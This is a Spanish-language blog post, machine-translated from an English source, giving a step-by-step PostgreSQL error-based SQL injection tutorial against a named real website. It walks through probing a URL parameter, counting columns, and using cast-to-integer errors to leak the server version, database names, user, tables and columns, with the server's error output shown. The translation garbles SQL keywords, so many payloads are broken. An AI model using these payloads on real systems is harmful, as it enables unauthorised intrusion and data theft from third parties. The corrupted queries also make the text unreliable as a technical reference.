Los sistemas tradicionales de gestión de bases de datosrelacionales (DBMS) soportan un modelo de datos que consta deuna colección de relaciones con nombre, que contiene los atributos de un tipo específico. En los actuales sistemascomerciales, los tipos posibles incluyen números de punto flotante, enteros, cadenas de caracteres,
dinero, y las fechas.
Vamos a empezar a jugar con Postgre:
1 º Paso encontrar la vulnerabilidad:
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 '
ERROR: error de sintaxis en o cerca de "''"su media este sitio web pueden ser errores injected.remember puede varía usted no conseguirá el mismo error cada vez.
Columnas segundo paso contar con:
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 orden de 1 -
obtener de página válido
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 orden de 2 -
Error ejecución de la consulta de bases de datos.ERROR: ORDER BY posición 2 no está en la lista de selecciónError que indica que hay una columna.
Vamos a tratar UNIÓN consulta SELECT:
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 y 1 = 2 UNION SELECT 1 -
Error ejecución de la consulta de bases de datos.ERROR: UNION carácter entero de diversos tipos y no puede ser igualada
Parece que UNION consulta SELECT no funciona!
Vamos a tratar Errorbased Postgre SQLi ...
Paso 3:
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 y 1 = rem (version (), int) -
ERROR: la sintaxis de entrada no es válida para enteros: "PostgreSQL 8.4.5 en i486-pc-linux-gnu, compilado por GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"
Como se puede ver que tiene la versión de servidor de base de datos postgres en forma de error.
Permite seguir adelante y encontrar el nombre de base de datos.
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 y 1 = rem ((seleccione datname del límite pg_database un offset 0) como int) -
Error ejecución de la consulta de bases de datos.
ERROR: la sintaxis de entrada no es válida para enteros: "scoutsqld"Scoutsqld es primero el nombre de base de datos que variey puede compensar para obtener los nombres de otras bases de datos.
scoutsqld es primera base de datos que podemos conseguir que los demás, cambiando de compensación:)
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 y 1 = rem ((seleccione datname del límite pg_database una posición 1) como int) -
Error ejecución de la consulta de bases de datos.ERROR: la sintaxis de entrada no es válida para enteros: "template0"template0 es la base de datos segundo por lo que puede aumentar la compensación hasta que ha obtenido un error.
Permite saber al usuario:
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 y 1 = rem ((usuario seleccionar entre un límite pg_database offset 0) como int) -
Error ejecución de la consulta de bases de datos.
ERROR: la sintaxis de entrada no es válida para enteros: "postgres"
postgres es el usuario:)
Permite encontrar las tablas:>4 º paso:
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 y 1 = cast ((select table_name de INFORMATION_SCHEMA.TABLES límite de un offset 0) como int) -
Error ejecución de la consulta de bases de datos.
ERROR: la sintaxis de entrada no es válida para enteros: "pg_type"
pg_type es la primera tabla, podemos conseguir que los demás mediante el cambio de compensación:)
5 º paso:
Ahora tenemos que encontrar las columnas de nuestra tabla específica!
e.g
nuestra mesa es una acción
de que tenemos que utilizar Oracle conversión char.
Pg_type = CHR (112) | | CHR (103) | | CHR (95) | | CHR (116) | | CHR (121) | | CHR (112) | | CHR (101)
por lo que nuestra consulta es la siguiente:
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 y un elenco = ((column_name seleccionar INFORMATION_SCHEMA.COLUMNS donde table_name = CHR (112) | | CHR (103) | | CHR (95) | | CHR (116) | | CHR (121) | | CHR (112) | | CHR (101) un límite de la posición 0), int) -
Error ejecución de la consulta de bases de datos.ERROR: la sintaxis de entrada no es válida para enteros: "typname"Y además usted puede encontrar las columnas con offset ..
Último paso:Ahora tenemos que extraer los datos de nuestra columna.
Código:http://www.creatop.com.cn/index.cfm?MenuID=80 y 1 = rem ((seleccione typname del límite pg_type un offset 0) como int) -
Error ejecución de la consulta de bases de datos.ERROR: la sintaxis de entrada no es válida para enteros: "bool"
Fuente: http://hackguide4u.blogspot.com/2011/06/postgre-error-based-sqli-tutorial.html
Traduccion: Dellcom1@
Saludos mundo Libre.
No hay comentarios:
Publicar un comentario